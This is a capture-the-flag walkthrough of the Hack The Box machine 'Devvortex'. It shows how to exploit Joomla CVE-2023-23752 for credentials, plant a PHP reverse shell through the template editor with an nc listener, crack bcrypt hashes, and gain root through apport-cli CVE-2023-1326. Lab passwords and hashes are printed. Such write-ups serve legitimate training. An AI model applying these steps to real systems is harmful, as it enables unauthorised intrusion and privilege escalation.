devvortex HTB

IP

10.10.11.242

Initial Nmap scan

 sudo nmap -p- --min-rate 10000 10.10.11.242 | cut -d"/" -f1 | tr '\n' ','

we have the following ports open on the target

22,80

Lets run a more in-depth scan of the target

sudo nmap -sCV -p22,80 -oA TCP_ports 10.10.11.242

results

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://devvortex.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

we can see

• domain name: devvortex.htb we can add this to our hosts file

• SSH is up on the target

• we have a nginx web server version 1.18.0

• most likely a ubuntu machine

Lets check out this web server

• pretty static little to no functionality

Lets run feroxbuster and see if we can find any directories

feroxbuster -u http://devvortex.htb -w /usr/share/seclists/SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -o dirs_http_.txt

• nothing to interesting

let's see if we can find any subdomains

wfuzz -c -f sub-fighter -u 'http://devvortex.htb' -H 'Host:FUZZ.devvortex.htb' -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt --hc 302

we do find a sub domain

dev

Lets add this to our hosts file

Lets checkout dev.devvortex.htb

• looks like an updated website

• Not alot of functionality, pretty static

Lets run feroxbuster and see if we can find any interesting directories

feroxbuster -u http://dev.devvortex.htb -w /usr/share/seclists/SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -o dirs_http_dev.txt

• hmm the output looks like it keeps erroring out lets try gobuster instead

gobuster dir -u http://dev.devvortex.htb -w /usr/share/seclists/SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -o dirs_http_dev.txt 

we do find some interesting directories

/images               (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/images/]
/home                 (Status: 200) [Size: 23221]
/media                (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/media/]
/templates            (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/templates/]
/modules              (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/modules/]
/plugins              (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/plugins/]
/includes             (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/includes/]
/language             (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/language/]
/components           (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/components/]
/api                  (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/api/]
/cache                (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/cache/]
/libraries            (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/libraries/]
/tmp                  (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/tmp/]
/layouts              (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/layouts/]
/administrator        (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/administrator/]

more particular /administrator , when we visit the directory we can see the following

Looks like its supposed to be a login page but we have an error weird?

• this actually resulted in a box reset

now we restarted the box we can see the follwoing

we need to find the version, as weak creds dont seem to work

we can find the version by visiting `http://dev.devvortex.htb/administrator/manifests/files/joomla.xml`

• we have version 4.2.6

Looks like this version of joomla is vulnerable to CVE-2023-23752 we can use the following exploit script

GitHub - gunzf0x/CVE-2023-23752: Binaries for "CVE-2023-23752"GitHub

What is CVE-2023-23752 ?

• I'll leave a great blog that explains the vulnerability but essentially its an authentication bypass vulnerability that allows unauthenticated users access to sensitive information about Joomla installation

https://www.vicarius.io/vsociety/posts/cve-2023-23752-joomla-unauthorized-access-vulnerability

Now lets exploit it

git clone https://github.com/gunzf0x/CVE-2023-23752.git
cd CVE-2023-23752
go run main.go -u http://dev.devvortex.htb

 ----> Database Type: mysqli
    ----> Hostname: localhost
    ----> User: lewis
    ----> Password: P4ntherg0t1n5r3c0n##
    ----> Database: joomla
    ----> Database Prefix: sd4fg_
                                  

we can see we have the creds for the user lewis Lets see if we can

SSH in

ssh lewis@10.10.11.242

• that a negative

Login via the administrator directory

• which we most certainly can

we can already see that the current php version is outdated, this server is currently using PHP version 7.4.3

• looking through the following article

https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/joomla

http://dev.devvortex.htb/templates/cassiopeia/rev.php

We should be able to upload a php reverse-shell through the templates configuration tab

1. we will use pentest monkeys reverse-shell so prepare you shell (change the ip and port to our local host)

2. through the "Global configuration" -> 'Templates" Tab on the left side menu

we can want to modify the the "Max, Upload Size" to 100000, i noticed problems with my file being to large to upload, click "Save"

1. Now from the left most menu we want to click on "System" -> "Site Templates"

then click on the "Cassiopeia Details and Files" template, this is the template we are going to modify

1. Click "New File"

give it a name and file type

click create

1. within the left menu, click on the new file we created

Copy and paste our php reverse-shell within the file, click Save (up the top)

1. Let's start our listener

rlwrap -cAr nc -lvnp 9001

1. Let's navigate through our browser to our rev.php

http://dev.devvortex.htb/templates/cassiopeia/rev.phpdev.devvortex.htb

We now have a shell on the system

let's upgrade our shell

python3 -c "import pty;pty.spawn('/bin/bash')"

while checking for ports listening internally we can see the following

• we can MySQL is running wonder if we can do anything with this

• we still have lewis credentials we found earlier maybe we can search the database

mysql -u lewis -p

Lets list the databases available to us

SHOW DATABASES;

joomla looks interesting, let's use this database

USE joomla;

list all the tables

SHOW TABLES;

we can see the following table sd4fg_users

select username,password from sd4fg_users;

we have some usernames and there encrypted passwords

+----------+--------------------------------------------------------------+
| username | password                                                     |
+----------+--------------------------------------------------------------+
| lewis    | $2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u |
| logan    | $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12 |
+----------+--------------------------------------------------------------+

Lets see if we can crack these

what kind of hashes are these

hashid
#input hash

• Blowfish(OpenBSD)

Let's use hashcat and crack the user logan hash

hashcat -m 3200 logan_hash /usr/share/wordlists/rockyou.txt

we have the cracked password of

tequieromucho

Lets see if we can SSH into the machine

ssh logan@10.10.11.242

• we are authenticated

Checking our sudo privileges

sudo -l

we can run the program

/usr/bin/apport-cli

after a quick google search this program is vulnerable

explains the vulnerability

GitHub - diego-tella/CVE-2023-1326-PoC: A proof of concept for CVE-2023–1326 in apport-cli 2.26.0GitHub

But essentially we have the ability to read a crash report in a vi like program, from here we can execute bash and jump straight into a root bash shell

logan@devvortex:~$ sudo /usr/bin/apport-cli -f

*** What kind of problem do you want to report?


Choices:
  1: Display (X.org)
  2: External or internal storage devices (e. g. USB sticks)
  3: Security related problems
  4: Sound/audio related problems
  5: dist-upgrade
  6: installation
  7: installer
  8: release-upgrade
  9: ubuntu-release-upgrader
  10: Other problem
  C: Cancel
Please choose (1/2/3/4/5/6/7/8/9/10/C): 1


*** Collecting problem information

The collected information can be sent to the developers to improve the
application. This might take a few minutes.

*** What display problem do you observe?


Choices:
  1: I don't know
  2: Freezes or hangs during boot or usage
  3: Crashes or restarts back to login screen
  4: Resolution is incorrect
  5: Shows screen corruption
  6: Performance is worse than expected
  7: Fonts are the wrong size
  8: Other display-related problem
  C: Cancel
Please choose (1/2/3/4/5/6/7/8/C): 2

*** 

To debug X freezes, please see https://wiki.ubuntu.com/X/Troubleshooting/Freeze

Press any key to continue... 

..dpkg-query: no packages found matching xorg
.................

*** Send problem report to the developers?

After the problem report has been sent, please fill out the form in the
automatically opened web browser.

What would you like to do? Your options are:
  S: Send report (1.4 KB)
  V: View report
  K: Keep report file for sending later or copying to somewhere else
  I: Cancel and ignore future crashes of this program version
  C: Cancel
Please choose (S/V/K/I/C): !
What would you like to do? Your options are:
  S: Send report (1.4 KB)
  V: View report
  K: Keep report file for sending later or copying to somewhere else
  I: Cancel and ignore future crashes of this program version
  C: Cancel
Please choose (S/V/K/I/C): v
root@devvortex:/home/logan#

we are now root